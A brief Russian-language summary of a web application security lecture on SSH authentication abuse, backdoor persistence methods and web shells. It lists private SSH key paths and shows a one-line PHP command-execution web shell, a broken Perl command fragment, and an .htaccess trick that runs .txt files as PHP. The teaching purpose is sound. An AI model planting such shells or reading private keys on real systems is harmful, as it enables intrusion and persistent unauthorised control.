Безопасность интернет приложений. Лекция 9_6. Auth, backdoor, web

528

В лекции 9_6 «Auth, backdoor, web» рассказывается о том, что такое Auth и как он используется злоумышленниками.

Ssh –iprivkey user@target

/home/user/.ssh/id.dsa

/home/user/.ssh/id.rsa

Говорится о backdoor:

  1. process
  2. cronjob
  3. patchrd binary
  4. kernel module

Рассказывается о том, что может сделать злоумышленник, имея доступ к web-приложению

<?php passthru($_REQUEST[‘c’]) ?>

…my@cmd=’$req’;

Foreach my $line(@cmd){

Print $line . “<br/>”;

}

AddType application/x-httpd-php .txt